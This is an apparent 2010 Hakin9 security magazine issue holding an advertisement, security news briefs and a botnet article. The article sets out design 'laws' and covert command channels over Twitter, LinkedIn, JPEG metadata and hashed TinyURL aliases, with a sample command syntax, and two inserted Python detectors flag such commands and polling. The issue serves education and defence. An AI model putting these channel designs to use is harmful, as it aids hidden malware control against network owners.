Hakin9



PRACTICAL PROTECTION 



IT SECURITY MAGAZINE 



Vol.5 No.8 
issue 8/2010 (33)
ISSN 1733-7186



MOBILE MALWARE 

- THE NEW CYBER THREAT 

ARMORING MALWARE: HIDING DATA WITHIN DATA 

BOTNET: THE SIX LAWS AND 
IMMERGING COMMAND & CONTROL VECTORS 
HACKINGJTRUST RELATIONSHIPS - PART II 

WEB MALWARES - PART II
LAYER-2 ATTACKS IN VOIP

IS ANTI-VIRUS DEAD? 




Penetration Testing Training 
that will make you stand out 




Learn as much as you want every day with no expiry pressure.
Our engaging e-learning environment is ideal if you work.
It sets you free from long, boring learning sessions.

Penetration testing has evolved. It's time to be professionals. 

Study how to handle your pentesting project and how to report your findings to executives, clients or your employer.



Our certification proves your skills as a hacker and as a professional. 

Produce your penetration testing report, have it reviewed by one of our instructors, and get recognized as a professional penetration tester.



The fastest path
to Professional
Penetration Testing



Thinking of advancing your IT Security career? 



Get Yourself Trained And Certified As A 
Penetration Tester... At Your Own Pace! 



Penetration testing is big business. 
As companies and government 
organizations go increasingly 
electronic, there is a growing demand for 
IT professionals who can evaluate the 
security of these computer systems, 
networks and suggest safeguards. 

Traditionally, training to become a 
certified "penetration tester" or "ethical 
hacker" has been a long, drawn-out 
process. Most certifications assume that 
candidates already have some form of 
networking or programming background, 
which makes it difficult for beginners to 
get started. Others require the physical 
attendance of training classes conducted 
only at certain locations. In all, the time 
and money spent in obtaining such a 
certification can be costly. 

A new breed of penetration testing courses in the market looks set to change all this. One such course is "Penetration Testing Pro" offered by eLearnSecurity, an Italian IT security firm headed by Armando Romeo, who is also founder of the respected Hackers Center Web Portal.

His real world credentials aside, Armando hopes "Penetration Testing Pro" will change the way such training is conducted in the industry. "We set out to design the most comprehensive training course for IT professionals and anyone who cannot take time off to attend physical lessons. Our course allows them to learn the latest intrusion methods at their own pace, through over 1600 interactive e-learning slides and video lessons. There's no longer a need to sit through hours of boring classes," he says.

A CEH AND LPT KILLER? 

Industry experts seem to agree with his methodology, too. Jason Haddix, columnist at EthicalHacker.net, feels the course has great potential.

"I kept thinking - this is what the CEH / 
LPT should have been - and I am 
delighted to say that if students can 
master the topics and techniques in 
eLearn Security's Penetration Testing Pro, 
they should be well on their way to being 
an accomplished pentester," he writes. 

CEH and LPT refer to Certified Ethical Hacker and Licensed Penetration Tester respectively, both the gold standards for penetration testing in the industry.

Another veteran industry insider, Timothy Everson from Novell, who holds multiple certifications such as MCNE, CDE, CLE and CCNA on top of the CEH, says, "For anyone who is budget constrained, I'd say, with total confidence, that the value of eLearnSecurity training meets or exceeds the value of many of the other programs available. If one truly desires to learn the technical aspects of IT security, it's a certification course well worth the time and investment."

Nathan Suri, an Information Security Architect who holds CISSP, SCJP and CSSLP certifications, agrees: "The combination of slides, video, and hands-on examples with the lab to practice some of the techniques makes it very effective. I like the balance of theory and practice."

REAL WORLD APPROACH USED 
BY PENTESTERS 

Perhaps it is this real world, raw approach to teaching penetration testing that has made this course so popular. Besides Armando, the other co-authors include Brett Arion, a U.S. IT security specialist, and Nitin and Vipin Kumar. Nitin and Vipin, both from India, rose to fame after presenting the acclaimed "Windows Vista Bootkit" and "Windows 7 Bootkit" research at BlackHat.

HOW TO BECOME A HIGHLY 
SOUGHT AFTER PENTESTER 

Armando explains, "Just because someone is certified does not make him a good penetration tester. Penetration testing is part art and science. A tester needs to have experience to know which vulnerabilities to look out for. He also needs to give workable, business-minded suggestions to his clients for countering these exploits."

Given the depth of knowledge required, 
can someone with no prior experience still 
be trained to become a good penetration 
tester? 



"Absolutely. The training aspect is key. We start with our e-learning slides and videos, which explain every aspect of web application, system and network security testing. We then follow up with labs and practical exercises. Instead of a multiple choice certification exam, ours is an actual penetration testing exercise. We are not just interested in testing theoretical knowledge. Candidates are required to conduct their own penetration tests on a given target and submit an actual test report for grading."

These rigorous requirements, Armando insists, are needed to ensure that the course is as realistic as possible. "Every student should have the confidence to conduct actual penetration testing in a commercial or mission critical setting."

IS THIS FOR YOU? 

If you are looking to further your IT career, or even make a transition to the lucrative field of penetration testing, this new breed of courses such as "Penetration Testing Pro" may be a great choice. Not only do they cost a mere fraction of what other certifications ask for, they are also a great way to get up to speed with the latest penetration testing methods by learning from actual hackers and understanding their psychology. Learning at one's own pace without having to set time aside for regular lessons is also a big draw.

At the end of the day, does Armando 
hope that his course will replace the CEH 
as the de facto certification in the 
industry? 

"Definitely not," he says with a laugh. "We provide the technical training and flexibility that the CEH does not. In fact, students who take our course as a starting point will also acquire most of the knowledge needed to pass other certifications such as CEH and LPT. This means they'll find it much easier later on to pass their certifications as well."

For more information on eLearnSecurity's Penetration Testing Pro course, visit http://www.eLearnSecurity.com.
Dear Readers,

We decided to devote this issue to malware. As you all know, malicious software is one of the biggest concerns and is definitely at the top of the security issues list nowadays.

Malware easily infects your computers - it doesn't matter whether you are visiting a website, using devices like USB drives, downloading files, opening an email attachment, etc. We are exposed to this type of danger all the time. The most serious threat is that malware is very often a Trojan, and our personal information can be stolen easily. That is why it is very important to stay up to date with recent knowledge about it, so that you know how to protect your computers.

This issue is a perfect fit for those of you who would like to be more familiar with malicious software. In the attack section you will find the second part of the Web Malware article from a previous issue by Rajdeep Chakraborty. Another must-read is a paper by Israel Torres, Armoring Malware: Hiding Data within Data. The third article also discussing malware is written by our ID fraud expert, Julian Evans, and is titled Mobile Malware - the new cyber threat. Another paper discussing the malware problem in detail is written by our regular contributor Gary S. Miliefsky and is titled Is Antivirus Dead? The answer is YES. Here's why...

I am sure that after reading the information in this magazine, 
your knowledge about malicious software will be much deeper 
and you will be more careful and malware-aware! 

Enjoy!



Karolina Lesinska 
Firefox Rogue Add-On
Collecting Passwords

Mozilla has issued a warning to its users that a Firefox add-on available from the official Mozilla Add-Ons website has secretly been sending users' stolen passwords to a remote location. Mozilla Sniffer was uploaded to the Mozilla Add-Ons website on June 6th, but was found to contain malicious code that sent the contents of website login forms to a remote location.

Source: ID Theft Protect 



USB Malware Threat to 
Windows Shortcuts 

Anti-virus researchers have discovered a new strain of malicious software that spreads via USB drives and takes advantage of a previously unknown vulnerability in the way Microsoft Windows handles .lnk (shortcut) files. Belarus-based VirusBlokAda discovered malware that includes rootkit functionality to hide the malware, and the rootkit drivers appear to be digitally signed by Realtek Semiconductor, a legitimate hi-tech company. In a further wrinkle, independent researcher Frank Boldewin found that the complexity and stealth of this malware may be due to the fact that it is targeting SCADA systems, those designed for controlling large, complex and distributed control networks, such as those used at power and manufacturing plants.

Source: ID Theft Protect 



ATMs hacked at BlackHat

BlackHat 2010 has brought a number of interesting talks to the table, as every year. Barnaby Jack, however, has surely stolen the show at BlackHat: with the talk Jackpotting Automated Teller Machines he demonstrated how to remotely exploit ATMs and withdraw money. The talk, scheduled for BlackHat 2009, had been pulled for the threat level it could pose to ATM vendors (and most of all their users) that, according to Barnaby, are still vulnerable one year later. This year Barnaby brought two new tools, which he custom coded: Scrooge and Dillinger. While the first is a rootkit capable of acting as a malicious ATM firmware and was demonstrated on stage by means of a USB stick, the latter is the tool that allows for the remote exploitation. The development of the malicious firmware, replacing the original through the USB stick, was made possible thanks to months of reverse engineering on ATM machines purchased by Barnaby and curiously kept in a room at his house.

The replacement is made possible thanks to easily available master keys, used by maintenance technicians, and the absence of any integrity check or signature on the software installed on the ATM. The scariest and most impactful part of Jack's research is the possibility of attacking ATMs over the Internet: it is possible to install the new malicious firmware by reaching the ATM modem through its dialing number.

Source: Armando Romeo, www.elearnsecurity.com

Android phones hit by 
malicious wallpapers 

Researchers from the AppGenome project, whose goal is to make people aware of the threats involved in mobile applications, have uncovered a new wave of, at the very least, suspicious applications for Android coming in the form of wallpapers. These applications gather sensitive data and send it back to the server imnet.us. The information sent in the clear includes phone number, subscriber id and more.

The examined wallpapers were authored by jackeey, wallpaper, callmejack and IceskYsl@1sters! and have been downloaded between 1 and 4 million times. While the use made of this information by the wallpapers' developer is still unknown, this should make it clear that even the most innocuous mobile application can be used as a data stealer.

Source: Armando Romeo, www.elearnsecurity.com

UK to stick with IE6 to keep 
costs low 

IE6 has been the cause of Aurora and of a number of other successful attacks, then dubbed APT - Advanced Persistent Threat, on corporations and governments, resulting in high profile espionage and theft of secrets. As soon as the Aurora exploit was published at the end of 2009, the German and French governments immediately dismissed the use of the browser in favor of the relatively more secure Internet Explorer 8. As surprising as it seems, while the whole of Europe drops the 9-year-old vulnerable browser, Prime Minister Brown first, and new Prime Minister Cameron now, decided to stick with IE6 because of the costs attached to a full review of all the web applications used for UK internal public administration and developed for IE6.

The UK counts over 300,000 desktops worldwide in public administration offices as well as the armed forces, most of them using IE6. The decision seems to be risk and cost based, although very unpopular, since petitions to dismiss IE6 came to Number 10 Downing Street in early 2010 from a number of top names in the industry.

Source: Armando Romeo, www.elearnsecurity.com

Root DNS Server secured 
with DNSSEC 

While BlackHat 2010 targeted ATMs and SSL, BlackHat 2008 dealt with the holes in DNS making virtually all DNS servers vulnerable to cache poisoning attacks. Dan Kaminsky, the researcher behind the attacks on DNS, had since those early days worked hard with a number of DNS server vendors to temporarily patch the vulnerable implementations. Over two years after that BlackHat, the upgrade to what is believed to be the long term solution to those issues has been ported to the root DNS servers. ICANN, with the collaboration of companies like VeriSign, has rolled out DNSSEC on all 13 root servers of the Internet. Work had started in January 2010, when server L-root had been the first to implement the protocol that should make the Internet and many of the services running on it more secure. Until the next attack.

Source: Armando Romeo, www.elearnsecurity.com

Firefox 4 to bring more 
security 

Mozilla foundation has made 
security one of their primary goals 
since the beginning. 

According to Secunia's comprehensive advisories database, the Firefox 3.0.x series has suffered 24 vulnerabilities in total, 14 in 2009 alone, 86% of which were rated High impact.

The picture is clear: Firefox needs 
more security. 

At BlackHat 2010, Mozilla representatives announced their plans for the new release, already available in beta: Firefox 4. Besides support for HTML5, which we believe will bring a number of new attack vectors, and the much needed new JavaScript engine, fixing of old vulnerabilities will happen.

The first to be patched will be the CSS history sniffing attack that allowed Jeremiah Grossman and others, some years ago, to demonstrate how easy it was to guess which websites the user had visited from the colors of the links to those websites in a web page.

A completely new and breakthrough feature is the possibility for the developer to declare what content is supposed to be contained in a page and what content should be treated as injection. This will help detect XSS attacks and mitigate their effects. In order to keep backward compatibility, developers will have to opt in to this feature.

Source: Armando Romeo, www.elearnsecurity.com

GSM hacking tools released 

Summer 2010 has seen a rise in the threat level to GSM communication, the most widespread mobile communication protocol, which we all use in our mobile phones.

A new cracking tool, called Kraken by its creator Frank Stevenson, has been released with the goal of providing an easy to use tool for cracking GSM intercepts. The tool is capable of cracking the A5/1 encryption algorithm much faster than tools released earlier this year, thanks to future support for GPU processing and a wider rainbow table.

In conjunction with another open 
source tool dubbed Airprobe and 
a computer programmable radio, 
costing around $1000, virtually 
any SMS and voice call can be 
decrypted. 

GSM telco carriers were expected to release a patch to the algorithms in use at least 2 years ago, but most of them have yet to do so, according to cryptography expert Karsten Nohl, who in 2009 had announced his plans to use distributed computing to knock down the time required to crack A5/1 encrypted communications. Now that techniques have been polished, tools are freely available and equipment is relatively affordable, it's time for AT&T and the like to act.

Source: Armando Romeo, www.elearnsecurity.com

Adobe Reader adds 
sandbox security 

Adobe announced last month (July 2010) that the next generation of its popular PDF viewer, Adobe Reader, will also include sandboxing technology. The sandboxing technology will be used in the Windows upgrade to Reader (version 10) before the end of 2010.

The sandboxing technology stops 
malicious PDF code from successfully 
writing to a PC. Any malicious code 
will ONLY be installed in the sandbox 
and not on the main operating 
system (your main hard drive). For 
an attack to succeed in a sandboxed 
environment, there would have to be 
two malicious files - one that writes 
and the other that allows the malware 
to work outside of the sandbox. 

Most sandboxing applications will 
allow you to control what programs 
are executed as well as sandbox 
your web browsing. Sandboxing is 
currently used with Internet Explorer 
7 and Internet Explorer 8 as well as 
the new Microsoft Office 2010. 

Adobe has also indicated that it will extend the read-only activities in a later release. Adobe Reader currently provides a plug-in for IE7 and IE8's Protected Mode (which is a sandbox) as well as Google Chrome's. The sandboxing technology will be turned on by default and will be named Protected Mode, the same term used by Microsoft in IE7 and IE8.

Source: ID Theft Protect 



Google Android wallpaper 
malware surfaces 

It's not porn, but it is still something Apple is probably going to try to make hay out of. At the always interesting Black Hat security conference in Las Vegas last month, Kevin Mahaffey, chief technology officer at mobile security firm Lookout, noted a group of Android wallpaper apps by the same developer which are stealing data from users that install them.

The innocent looking wallpaper apps collect your phone's SIM card number, browsing history, text messages, subscriber identification, and even your voice mail password. They send the data to a web site, xxx.imnet.us. That site is apparently owned by someone in Shenzhen, China (ironically, where a lot of Apple products are assembled).

Source: ID Theft Protect 
Botnet:



The Six Laws And Immerging Command & Control Vectors 

New BotNet communication vectors are emerging. The 
industry is not prepared. For the next 20 years, BotNets will 
be what viruses were for the last 20. 



What you will learn...

• BotNet design elements

• New BotNet communication vectors (advanced)

• Programs that can tell you if you are a part of a BotNet

What you should know...

• Ethernet communications

• Network security & monitoring

• BotNet architecture



Define: Botnet 

A BotNet agent is typically installed via a drive-by download. The agent (the Bot) is a software program that is installed on a host. Once installed it runs automatically and independently of any other program. Agents typically receive instructions from a BotMaster and are used for a variety of malicious purposes.

Define: Drive-by-download 

A Drive-By-Download refers to a download that takes 
place without the permission (or understanding) of 
a user. 

In The News 

Recently in the news, a band of hackers was discovered to have in their possession tens of thousands of user names and passwords. The proposed attack vector was spam. Various emails and posts on social networking sites would lead victims to click on a link... Game over. In most of these stories, unless the authors hide their tracks well, they are ultimately captured.

However, take for example the Kneber BotNet, a new form of malware that has infected over 100,000 computer systems around the world. The goal of this particular piece of malware is to steal login credentials for email systems and banking credentials/logins. Kneber is a ZeuS Trojan BotNet, and it happens to be excellent at stealing private information stored on local computers. In most cases, systems infected with Kneber also have the Waledac Trojan worm, which is used to create email spam BotNets. The main target is Windows computers.

Botnet 

It's a growing concern that novices and experts alike have access to professional grade tools for creating and managing BotNets. Not only do they have access to the tools, but they are laying digital traps all over the Internet. The media has focused mainly on the tools. When victims land on these infected websites, a third party is then able to take full control of the host (Windows PC). These newly infected PCs are called Bots and are enrolled in BotNets. Once a Bot infects your PC, it calls out to its command-and-control (C2C) server for instructions.

These BotNets are then maintained and managed like any other network. Frequently the media tells us that BotNets are used for distributed denial of service (DDoS) attacks, but this is not always the case: some are indeed built to send spam, some work as HTTP servers for adult content, some are proxybots (yes, a Bot that installs a SOCKS4/5 proxy on your machine), and others are used for distributed computing such as password cracking.




The 6 Laws & Botnet Design 

What is good BotNet design? What qualifies as a good BotNet? What are the common characteristics that all BotNets should have in common? I've spent some time thinking about this and I've tried to boil them all down into THE 6 LAWS OF THE BOTNET: thoughts around design, process, existence, and operation.

Law 1 : The Botnet Must Know Its Overall Goal, 
Objective And Operational Environment 

The BotNet needs to know itself. It needs to 
understand the overall goal and objective set for 
itself by its designers and creators. It must know its 
environment and the context surrounding its activities 
and adapt to it. 

Law 2: The Botnet Must Perform Installation, 
Configuration, And Self Optimization Functions 
Without Human Intervention 

It must perform its installation and configuration 
without human intervention. It must be able to run self 
optimization functions as needed or schedule them so 
that it has the capability to optimize its operations and 
tasks. 

Law 3: The Botnet Must Implement Self Healing
Functions

The BotNet must have the capability to implement 
self healing functions. If something breaks, it must be 
able to assess the issue and overcome the issue. The 
application needs situational health awareness so if 
something breaks, it should be able to overcome these 
issues and survive in the network. Scenarios where 
various elements of the BotNet will jump networks 
and platforms to heal because statistically it will have 
a higher chance of self healing without detection on one 
platform (cellphone) versus another (student laptop) 
seem plausible. 

Law 4: The Botnet Must Self Protect 

The virtual world is no less dangerous than the physical one, so the BotNet must be able to do some self protection: first identify whether there are abnormal situations and then act on them. Think flooding ports, temporary CPU/memory starvation, jamming/blocking known A/V update paths/routes/mechanisms, etc.

Law 5: The Botnet Must Be Based On Standards And
Have Interoperability Within All Known Digital
Devices

It can't exist in a hermetic environment. It requires 
standards and interoperability within all digital 
devices. 



Law 6: The Botnet Must Anticipate, Optimize, and
Obtain Resources

It must anticipate, optimize, and get resources.

Back In The Office

Today, network administrators, engineers, and managers are working hard to combat this growing threat - the BotNet. They are trying to understand the architecture and scope, learn the detection methods, the nature of the contagion, the propagation vectors, and how to prevent them. Meanwhile, inside the corporation, directors, department heads, and those with budgetary discretion are allocating more and more money - and it's not working. Meanwhile the CEOs, board members, and advisors are starting to ask the hard questions about this peculiar line item in the budget that continues to grow unabated. Make no mistake, BotNets are here to stay.

Class 777: Advanced Placement Class (W/lab) 

Let's take a look at what's going on at the very edge of the envelope - the tail of the bell curve, if you will. What research projects are the smart people working on? Take for example the work being done by luminaries Tom Eston, Robin Wood, Kevin Johnson, and Mubix.

KreiosC2

Let's talk about the latest version of Robin Wood's KreiosC2. He and others like him are paving the way for new BotNet communication vectors. The KreiosC2 proof-of-concept (POC) Bot explores the possibilities of using different communication vectors as the command and control channel.

What has the Internet all abuzz is that the BotNet administrator (bSysOp? BotOp? I digress...) can use a Twitter feed to perform an action. The most recent version (v3) was released at ShmooCon 2010 as part of the Social Zombies II: Your Friends Need More Brains talk by Tom Eston, Kevin Johnson and Robin Wood.

C2C & Social Media:
Forward Vectoring With Twitter

The idea is that most companies now know how to block IRC from the internal network. Fine. However, they are not blocking HTTP or HTML. So what part of HTTP are they using?

Botnet Management
Has Evolved Beyond IRC

Why should you use something else to manage a BotNet? IRC is accessible and available! The reason is that most security professionals associate negative things with IRC and frequently block it, but it's not outside the realm of possibility (in a normal operational environment) to expect a business machine to be active on Twitter and LinkedIn and to transfer JPEGs, all to and from random servers.

New Vector: Twitter 

The administrator can use Twitter exclusively to manage the BotNet. A commander would send out a Tweet that basically said "Bots, do this" and the Bots would then act on the command issued.

Note 

You have probably read about early attempts at this covered in the media, which were based on early versions and concepts that were not optimized or stealthy.

Encryption 

Another way to send commands is to base64-encode them and then put them on Twitter (base64 is an encoding, not encryption, so it only hides the command from a casual reader). How it works: the Bot would be on Twitter following someone that looks like a BotNet administrator, a BotMaster if you will. You can even choose what language you want the communication to be done in.

The default syntax is very basic. 

SYNTAX: a colon (:), CMD, and then whatever you want the Bot to do, for example:

• Ping something, 

• Execute a command, or 

• Download a file 

All done over Twitter. 

It would be easy to block that communication; the smart money would say change the language! Languages will end up being a snap-in module. You can write/create/drop in a module that does it in English.

So instead of saying: 

SYNTAX ":CMD PING 10.0.0.1" 

You could say "Look at this amazing address 10.0.0.1" and it will look like a normal Twitter post because it's in a more English vernacular (natural expression). The more effort you put into the language, the easier you can make it fit in with common tweet traffic. Intrusion Detection Systems (IDS) will find this challenging to detect and Intrusion Prevention Systems will need modification to stop it.

New Vector: LinkedIn

Newer platforms have integrated LinkedIn. How can a BotNet be used on LinkedIn? LinkedIn recently added an Application Programming Interface (API) that allows you to read any field in a LinkedIn user's profile and read/write the status field on your own profile. People are posting BotNet commands as status updates on profiles.

New Vector: Pictures 

A new BotNet command and control method utilizes a JPEG. While this has already been tried, previous attempts just used a JPEG header followed by the commands, but when you took a closer look at the file, in a viewer perhaps, you were not able to see the picture. Fail. It was garbled because there is no body to it. Most people don't know that JPEGs allow metadata!

TIP 

JPEGs allow metadata, so keep the valid JPEG and insert the data into a metadata field.

The Bot then just needs to pull the same JPEG over and over again to keep things updated, as frequently or infrequently as needed. You could say "here are 25 JPEGs, go grab all of them" and the activity is not going to trip any IDS, or any other perimeter defense for that matter.
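From the defender's side, both the Twitter syntax above and the JPEG metadata vector leave the command itself in a text field somewhere. The added example below (not code from the article or from KreiosC2) walks the metadata segments of a JPEG (COM and APPn) and checks them, as it would a tweet or status update, for the default ":CMD ..." syntax in plain or base64-encoded form; the sample JPEG and the base64 string are constructed for the demonstration, and the "English vernacular" variant is deliberately out of scope, since the article's point is that it defeats this kind of signature matching.

```python
import base64
import re
import struct

# Default KreiosC2-style syntax from the article: a colon, CMD, then the action.
CMD_RE = re.compile(r":CMD\s+[^\n]+", re.IGNORECASE)
# Runs of base64 alphabet long enough to hold a command; short words are skipped.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample: base64 of ":CMD PING 10.0.0.1", as it might appear in a tweet.
SAMPLE_ENCODED = "OkNNRCBQSU5HIDEwLjAuMC4x"


def find_commands(text):
    """Return commands found in text, in plain or base64-encoded form."""
    found = [m.group(0).strip() for m in CMD_RE.finditer(text)]
    for token in B64_TOKEN_RE.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # an ordinary long word or binary data, not an encoded command
        found.extend(m.group(0).strip() for m in CMD_RE.finditer(decoded))
    return found


def jpeg_metadata_segments(data):
    """Yield (marker, payload) for each COM (0xFE) or APPn (0xE0-0xEF) segment.

    Walks the marker segments that precede the entropy-coded image data (SOS),
    which is where all free-form metadata lives; the pixel data is not touched.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte, allowed before any marker
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            pos += 2
            continue
        if marker in (0xD9, 0xDA):               # EOI or SOS: no more metadata segments
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        payload = data[pos + 4:pos + 2 + length]
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:
            yield marker, payload
        pos += 2 + length


def scan_jpeg(data):
    """Return [(marker, command), ...] for commands hidden in JPEG metadata."""
    hits = []
    for marker, payload in jpeg_metadata_segments(data):
        # latin-1 maps every byte to a character, so binary payloads never fail here.
        for cmd in find_commands(payload.decode("latin-1")):
            hits.append((marker, cmd))
    return hits


def build_sample_jpeg(comment):
    """Constructed JPEG prefix (SOI, JFIF APP0, COM, SOS header) for the demo.

    It is not a decodable picture; it only exercises the segment walker.
    """
    def segment(marker, payload):
        return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8" + segment(0xE0, app0)
            + segment(0xFE, comment.encode("latin-1")) + b"\xff\xda\x00\x02")


if __name__ == "__main__":
    for text in (":CMD PING 10.0.0.1", "holiday pics " + SAMPLE_ENCODED,
                 "Look at this amazing address 10.0.0.1"):
        print(repr(text), "->", find_commands(text))
    print(scan_jpeg(build_sample_jpeg("vacation " + SAMPLE_ENCODED)))
```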

New Vector: Tiny Url 

Going over a TinyURL-type service. Services like IS.GD and Bit.LY will also work fine. How it works: TinyURL allows you to specify the alias that's being shot out, and that's why it's good. Keeping BotNets up to date will come down to modular design and utilization of updated modules.

The way the alias is created is based on a (timestamp 
+ keyword) hashed together; a number of them are 
created per timeslot. 

Every 10 minutes you can have up to 5 valid aliases. If the BotNet administrator wants to send out a command, he generates that list of aliases from the hashes and asks whether the first one is available. If it is, he says "please shrink me this URL, using this alias." The URL is XYZCorp.COM/ping 10.0.0.1 (a basic query string). So what the Bot does every 10 minutes is generate this same list, because it knows the algorithm for it, go to TinyURL and ask "does this alias exist?" YES. OK, what URL is that shrinking? It gets the URL and pattern matches it. Is it a valid command? Yes, and it executes it. Done.

It works out the hash and says to TinyURL, "give me the URL that has been shortened by this alias," then uses a regular expression to ask, "does this look like a valid command that I can run?" However, today, nothing stops someone else from stealing your Bots. What you could do about that is add hashes or encryption.
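From the defender's side, the scheme above has a fixed rhythm: a Bot re-derives its candidate aliases and asks the shortener about them every 10 minutes, whether or not a command exists yet. The added example below (not code from the article or from KreiosC2) runs that check over constructed proxy log lines, flagging clients whose alias lookups to tinyurl.com, is.gd or bit.ly recur at a steady period; the log format, the 600-second period and the 60-second tolerance are assumptions.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import urlsplit

# Shortener hosts named in the article; extend with whatever your proxy sees.
SHORTENER_HOSTS = {"tinyurl.com", "is.gd", "bit.ly"}

# Constructed proxy log format: "<unix_ts> <client> GET <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+GET\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

# Constructed sample: 10.1.2.3 checks a short list of aliases every ~10 minutes
# (404 = alias not created yet, 200 = an alias exists); 10.1.2.9 is a normal user.
SAMPLE_LOG = [
    "1000 10.1.2.3 GET http://tinyurl.com/a9f3k2 404",
    "1003 10.1.2.3 GET http://tinyurl.com/b7c1x0 404",
    "1500 10.1.2.9 GET http://bit.ly/3xYz 301",
    "1600 10.1.2.3 GET http://tinyurl.com/c4d8m1 404",
    "1604 10.1.2.3 GET http://tinyurl.com/d2e5n7 200",
    "1700 10.1.2.3 GET http://www.example.com/index.html 200",
    "2200 10.1.2.3 GET http://tinyurl.com/e1f6p3 404",
    "2801 10.1.2.3 GET http://tinyurl.com/f0g9q5 404",
    "9000 10.1.2.9 GET http://bit.ly/9aBc 301",
    "this line is not a log record",
]


def parse_line(line):
    """Parse one log line into (ts, client, url, status), or None if malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return int(m["ts"]), m["client"], m["url"], int(m["status"])


def shortener_alias(url):
    """Return the alias if url looks up a single alias on a known shortener, else None."""
    parts = urlsplit(url)
    if parts.hostname not in SHORTENER_HOSTS:
        return None
    alias = parts.path.strip("/")
    if not alias or "/" in alias:
        return None  # home page or a deeper page, not an alias lookup
    return alias


def find_polling_clients(lines, period=600, tolerance=60, min_polls=4):
    """Flag (client, host) pairs that look up shortener aliases at a steady period.

    Requests closer together than `tolerance` count as one poll (a Bot checks
    its whole list of candidate aliases for the current slot in a burst); the
    gaps between polls must all sit within `tolerance` of `period`.
    Returns {(client, host): {"polls", "aliases", "median_gap"}}.
    """
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, url, _status = rec  # a 404 is still a poll, so keep all statuses
        alias = shortener_alias(url)
        if alias is not None:
            events[(client, urlsplit(url).hostname)].append((ts, alias))

    flagged = {}
    for key, hits in events.items():
        hits.sort()
        poll_starts = []
        last_ts = None
        for ts, _alias in hits:
            if last_ts is None or ts - last_ts > tolerance:
                poll_starts.append(ts)
            last_ts = ts
        if len(poll_starts) < min_polls:
            continue
        gaps = [b - a for a, b in zip(poll_starts, poll_starts[1:])]
        if all(abs(g - period) <= tolerance for g in gaps):
            flagged[key] = {
                "polls": len(poll_starts),
                "aliases": len({alias for _, alias in hits}),
                "median_gap": median(gaps),
            }
    return flagged


if __name__ == "__main__":
    for key, info in find_polling_clients(SAMPLE_LOG).items():
        print(key, info)
```

A steady period alone is a lead, not a verdict: RSS readers and update checkers poll too, so the flagged hosts are candidates for a look at what the aliases resolve to.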

Adaptation & Improvisation 

Is it a framework? Can it be extended? Will it blend? RSS or Atom and do all that? Yes. The languages and control channels in KreiosC2 are modular in design.



On the 'Net

KreiosC2 www.digininja.org/kreiosc2
Watch the BBC Click episode
Videos www.watchguard.com/education/videos.asp
Website www.securitytube.net
Simple IRC bot www.osix.net/modules/articlenid-7S0
Conficker Paper www.mtc.sri.com/Conficker/addendumC/
URL TINY URL www.tinyurl.com
URL IS GD www.is.gd
URL Bit LY www.bit.ly
Microsoft Removal Tool www.microsoft.com/security/malwareremove/default.aspx
BotHunter www.bothunter.net
hak5.org
Jobs www.Not5oJankJobs.com



When it is up and running, there is a change language 
and change channel command. That command 
basically says, ok Bots, use this language instead. 

The Bot then goes to a website, downloads the 
language file and changes to that language. So as soon 
as you feel the network is about to be compromised, 
you can move on to the next social network. 

Example 

Let's say you are encrypted on Twitter, and you realize 
that it's being noticed; you can now move to English 
on LinkedIn, and then you can move somewhere else, 
upload JPEGs to Photobucket, etc. 

Protection Options 

Clearly all of these new vectors, if used maliciously, can 
put the national infrastructure at risk. What options are 
available for protecting hosts and networks? 

Options: Airwalls 

A duplicate system for every electronic system and 
all systems need to mirror a paper system. Systems 
and networks that are physically airwalled from other 
systems are the solution. This is an old solution. 
A complete solution will require airwalling at every 
level of the OSI model up to and including the physical 
communication lines. 

Options: Sneakernet 

A throwback term that referred to a time when people 
would walk over to hand you a floppy disk, or a term used 
to make fun of someone's lousy network. Regardless, we 
need to have some type of redundancy in our systems. 
A new designation [P] will be utilized to note systems 
that have a paper equivalent. 

TIP 

Global stock exchanges, banks, and other financial 
institutions should create mirror processes and 
communications plans that utilize paper only. 




Options: Deep Packet Inspection 

We have arrived at the day when every packet that 
traverses the Internet requires deep level packet 
inspection. This will require high speed hardware and 
software to evaluate every packet. How will I achieve 
that if my core routing/switching hardware has a low 
fixed speed backplane? Also, evaluation of the packet 
will entail some type of Intrusion Detection and Intrusion 
Prevention analysis ultimately utilizing null routes and 
various other blocking mechanisms. 

Botnet Detection 

At the end of the day, communications in and out of 
a host (frequently in the form of a flood) help anti- 
malware applications detect a known Bot. These 
communications give clues to how big the BotNet is. 

Fact 

Antivirus software can't keep up with the rapid 
developments of BotNets and the growing number of 
threats. 

Some relief is available, however: Microsoft provides 
a free Malicious Software Removal Tool. Proactive 
options are also available. BotHunter is a fantastic 
program from SRI International that works with Unix, 
Linux, Mac OS, Windows XP, and Vista. BotHunter 
listens passively to Internet traffic through your machine 
and keeps a log of the data exchanges that typically occur 
when a PC is infected with malware. 

Free Joke 

A "friend" of mine told me that the only way in the future 
to confirm a computer was not part of a BotNet was to 
look for the apple logo somewhere on the case. I replied: 
Hello? Can you hear me now? Hello? Hello? Can you 
hear me now? 
ATTACK 

Hacking Trust Relationships 

Part II 

This is the second article in a series of six that covers the 
topic of hacking trust relationships. This article focuses 
specifically on Vulnerability Identification against a target 
system, in order to identify and exploit potential trust 
relationships. 



What you will learn... 

• How to recognize trust relationships that can be exploited 

• Why it is critical to verify findings using multiple hacker tools 



What you should know... 

• How systems establish trust relationships between users and 
remote applications 

